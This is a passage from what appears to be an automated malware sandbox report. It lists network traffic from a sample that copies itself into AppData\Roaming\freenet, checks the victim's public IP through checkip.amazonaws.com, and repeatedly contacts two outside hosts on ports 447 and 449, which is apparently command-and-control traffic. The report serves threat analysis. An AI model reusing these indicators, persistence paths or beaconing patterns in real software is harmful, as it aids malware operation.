Jun 5, 2018 11:07:14.218111992 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218118906 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218127966 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218139887 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218147993 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218154907 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218163013 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218581915 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.218610048 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218625069 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218636036 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218645096 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218655109 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218669891 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218678951 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218688965 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218697071 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.218704939 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.219084024 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.219108105 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.219121933 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.219130993 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.219139099 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.219146967 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.219489098 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.423033953 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.423181057 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.695260048 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.695302963 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.695322037 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.695452929 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.898997068 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999598980 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.999641895 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999682903 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999691010 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999706984 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999718904 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999733925 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999741077 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999748945 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999758959 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999767065 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999898911 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:14.999916077 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999926090 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999933958 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999941111 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999948025 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999954939 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999962091 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999974966 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999983072 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:14.999994993 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001216888 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:15.001255989 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001271963 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001280069 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001287937 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001296043 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001306057 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001313925 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001322031 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001331091 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001338005 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001898050 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:15.001924038 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001935959 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001944065 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001951933 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001959085 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001966000 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001972914 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001980066 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001987934 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.001995087 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.002362013 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:15.002383947 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.002393961 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.002727032 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:15.211018085 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.336323977 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:15.336349964 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.336369038 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.336384058 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.336462975 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:15.413139105 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:15.413162947 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.413175106 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.413182020 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.413189888 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.413197041 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.413203955 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.413211107 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:07:15.413271904 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:15.749520063 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:15.872889042 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:07:26.102672100 MESZ804918954.84.34.26192.168.1.16
Jun 5, 2018 11:07:26.102780104 MESZ4918980192.168.1.1654.84.34.26
Jun 5, 2018 11:07:26.176018953 MESZ4918980192.168.1.1654.84.34.26
Jun 5, 2018 11:07:26.176073074 MESZ804918954.84.34.26192.168.1.16
Jun 5, 2018 11:07:48.886017084 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:48.886061907 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.171006918 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.171047926 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.171063900 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.171334982 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.182265997 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.182286978 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.182522058 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.190288067 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.190320015 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.190334082 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.190488100 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.193056107 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.193085909 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.193099976 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.193223953 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.237365007 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.348021984 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.348076105 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.348337889 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.348376989 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.359787941 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.360069036 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.360105991 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.404026031 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.404056072 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.404176950 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.404198885 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.406749010 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.406773090 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.406924009 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.406944036 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.534621000 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.534668922 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.534687042 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.534734964 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.534754038 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.534919977 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.534961939 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.537348986 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.537386894 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.537574053 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.537614107 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.546911001 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.546946049 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.547156096 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.547199965 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.705327988 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.705353022 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.705563068 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.705621004 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.727663994 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.727688074 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.727857113 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.727900982 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.730457067 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.730629921 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.730679035 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:49.934340000 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:49.934392929 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:50.137320995 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:51.909285069 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:51.909311056 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.212146997 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.212177038 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.212183952 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.212193012 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.212198973 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.212269068 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.212281942 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.212524891 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:52.212563992 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.214832067 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.214854956 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.215120077 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:52.215148926 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.390542984 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.390563011 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.390788078 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:52.390831947 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.393281937 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.393302917 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.393455029 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:52.393495083 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.401916027 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.401945114 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.402103901 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:52.402142048 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.438174009 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.438194990 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.438386917 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:52.438437939 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.572355032 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.572390079 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.572606087 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:52.572643995 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.575119019 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.575273991 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:52.575309992 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.582331896 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.582359076 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.582432032 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:52.582453966 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.585146904 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.585266113 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:52.585288048 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:52.793281078 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:54.032186031 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:54.032237053 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:54.315809965 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:54.590178013 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:57.467705011 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:57.467768908 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:57.467925072 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:57.467941046 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:57.758075953 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:57.996486902 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:58.453470945 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:58.453502893 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:58.453689098 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:58.453705072 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:58.758742094 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:58.996510983 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:59.502473116 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:59.502507925 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:59.502664089 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:59.502680063 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:59.603178978 MESZ49193449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:59.603234053 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:07:59.603295088 MESZ49193449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:59.604312897 MESZ49193449192.168.1.16185.42.192.194
Jun 5, 2018 11:07:59.604338884 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:07:59.782455921 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:07:59.980456114 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:00.015211105 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:08:00.084382057 MESZ49193449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:00.084420919 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:08:00.343182087 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:08:00.499882936 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:00.499917030 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:08:00.500154018 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:00.500170946 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:08:00.542973995 MESZ49193449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:00.861963987 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:08:00.966797113 MESZ49193449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:00.966849089 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:08:01.150739908 MESZ5691753192.168.1.168.8.8.8
Jun 5, 2018 11:08:01.152406931 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:01.218214989 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:08:01.219690084 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:01.219727039 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:08:01.361598015 MESZ53569178.8.8.8192.168.1.16
Jun 5, 2018 11:08:01.376378059 MESZ6497053192.168.1.168.8.8.8
Jun 5, 2018 11:08:01.434748888 MESZ49193449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:01.553617001 MESZ53649708.8.8.8192.168.1.16
Jun 5, 2018 11:08:01.602179050 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:08:01.613406897 MESZ49193449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:01.613464117 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:08:01.809263945 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:01.895248890 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:08:01.913467884 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:01.913507938 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:08:02.090032101 MESZ49193449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:02.218909025 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:08:02.220247030 MESZ49193449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:02.220269918 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:08:02.433725119 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:02.496746063 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:08:02.496788979 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:08:02.497036934 MESZ49193449192.168.1.16185.42.192.194
Jun 5, 2018 11:08:03.875978947 MESZ49195443192.168.1.1678.155.199.51
Jun 5, 2018 11:08:03.876019955 MESZ4434919578.155.199.51192.168.1.16
Jun 5, 2018 11:08:03.876084089 MESZ49195443192.168.1.1678.155.199.51
Jun 5, 2018 11:08:03.877017021 MESZ49195443192.168.1.1678.155.199.51
Jun 5, 2018 11:08:03.877037048 MESZ4434919578.155.199.51192.168.1.16
Jun 5, 2018 11:08:19.160844088 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:08:19.160888910 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:08:19.161031008 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:08:19.163917065 MESZ49192447192.168.1.1694.250.254.22
Jun 5, 2018 11:08:19.163966894 MESZ4474919294.250.254.22192.168.1.16
Jun 5, 2018 11:09:07.210490942 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:09:07.210536957 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:09:07.210658073 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:09:07.211112022 MESZ49190449192.168.1.16185.42.192.194
Jun 5, 2018 11:09:07.211153984 MESZ44949190185.42.192.194192.168.1.16
Jun 5, 2018 11:09:07.481892109 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:09:07.481929064 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:09:07.483464003 MESZ49193449192.168.1.16185.42.192.194
Jun 5, 2018 11:09:07.485991955 MESZ49193449192.168.1.16185.42.192.194
Jun 5, 2018 11:09:07.486094952 MESZ44949193185.42.192.194192.168.1.16
Jun 5, 2018 11:10:07.875730038 MESZ4434919578.155.199.51192.168.1.16
Jun 5, 2018 11:10:07.877336979 MESZ49196443192.168.1.1678.155.199.51
Jun 5, 2018 11:10:07.877383947 MESZ4434919678.155.199.51192.168.1.16
Jun 5, 2018 11:10:07.877465963 MESZ49196443192.168.1.1678.155.199.51
Jun 5, 2018 11:10:07.878758907 MESZ49196443192.168.1.1678.155.199.51
Jun 5, 2018 11:10:07.878782034 MESZ4434919678.155.199.51192.168.1.16
Jun 5, 2018 11:12:18.883879900 MESZ4434919678.155.199.51192.168.1.16
Jun 5, 2018 11:12:19.984013081 MESZ49197443192.168.1.1678.155.199.51
Jun 5, 2018 11:12:19.984062910 MESZ4434919778.155.199.51192.168.1.16
Jun 5, 2018 11:12:19.984188080 MESZ49197443192.168.1.1678.155.199.51
Jun 5, 2018 11:12:19.985416889 MESZ49197443192.168.1.1678.155.199.51
Jun 5, 2018 11:12:19.985443115 MESZ4434919778.155.199.51192.168.1.16
Jun 5, 2018 11:14:19.875865936 MESZ4434919778.155.199.51192.168.1.16
Jun 5, 2018 11:14:19.877186060 MESZ49198443192.168.1.1678.155.199.51
Jun 5, 2018 11:14:19.877238989 MESZ4434919878.155.199.51192.168.1.16
Jun 5, 2018 11:14:19.877331018 MESZ49198443192.168.1.1678.155.199.51
Jun 5, 2018 11:14:19.877717018 MESZ49198443192.168.1.1678.155.199.51
Jun 5, 2018 11:14:19.877739906 MESZ4434919878.155.199.51192.168.1.16

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Jun 5, 2018 11:06:25.378803968 MESZ5697553192.168.1.168.8.8.8
Jun 5, 2018 11:06:25.543195009 MESZ53569758.8.8.8192.168.1.16
Jun 5, 2018 11:06:25.561767101 MESZ5120853192.168.1.168.8.8.8
Jun 5, 2018 11:06:25.798557043 MESZ53512088.8.8.8192.168.1.16
Jun 5, 2018 11:06:29.601973057 MESZ6222853192.168.1.168.8.8.8
Jun 5, 2018 11:06:30.218615055 MESZ53622288.8.8.8192.168.1.16
Jun 5, 2018 11:06:30.227106094 MESZ5865953192.168.1.168.8.8.8
Jun 5, 2018 11:06:30.462589979 MESZ53586598.8.8.8192.168.1.16
Jun 5, 2018 11:08:01.150739908 MESZ5691753192.168.1.168.8.8.8
Jun 5, 2018 11:08:01.361598015 MESZ53569178.8.8.8192.168.1.16
Jun 5, 2018 11:08:01.376378059 MESZ6497053192.168.1.168.8.8.8
Jun 5, 2018 11:08:01.553617001 MESZ53649708.8.8.8192.168.1.16

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Jun 5, 2018 11:06:25.378803968 MESZ192.168.1.168.8.8.80x47bdStandard query (0)checkip.amazonaws.comA (IP address)IN (0x0001)
Jun 5, 2018 11:06:25.561767101 MESZ192.168.1.168.8.8.80x787eStandard query (0)checkip.amazonaws.comA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Jun 5, 2018 11:06:25.543195009 MESZ8.8.8.8192.168.1.160x47bdNo error (0)checkip.amazonaws.com54.84.34.26A (IP address)IN (0x0001)
Jun 5, 2018 11:06:25.798557043 MESZ8.8.8.8192.168.1.160x787eNo error (0)checkip.amazonaws.com54.84.34.26A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • checkip.amazonaws.com

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.1.164918954.84.34.2680C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
TimestampkBytes transferredDirectionData
Jun 5, 2018 11:06:25.802413940 MESZ0OUTGET / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Host: checkip.amazonaws.com
Jun 5, 2018 11:06:26.081968069 MESZ1INHTTP/1.1 200 OK
Date: Tue, 05 Jun 2018 09:06:25 GMT
Content-Length: 16
Connection: keep-alive
Server: lighttpd/1.4.29
Data Raw: 31 39 37 2e 32 33 31 2e 32 32 31 2e 32 31 31 0a
Data Ascii: 197.231.221.211


Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ucD6u0vstJ.exe PID: 3480 Parent PID: 2932

General

Start time:11:05:26
Start date:05/06/2018
Path:C:\Users\user\Desktop\ucD6u0vstJ.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\ucD6u0vstJ.exe'
Imagebase:0x400000
File size:233984 bytes
MD5 hash:DE1CE3514F777178D672EE79AC398A74
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: ucE7u0vttK.exe PID: 3492 Parent PID: 3480

General

Start time:11:05:27
Start date:05/06/2018
Path:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Roaming\freenet\ucE7u0vttK.exe
Imagebase:0x400000
File size:233984 bytes
MD5 hash:DE1CE3514F777178D672EE79AC398A74
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Chronological Activities

Analysis Process: taskeng.exe PID: 3536 Parent PID: 836

General

Start time:11:06:03
Start date:05/06/2018
Path:C:\Windows\System32\taskeng.exe
Wow64 process (32bit):false
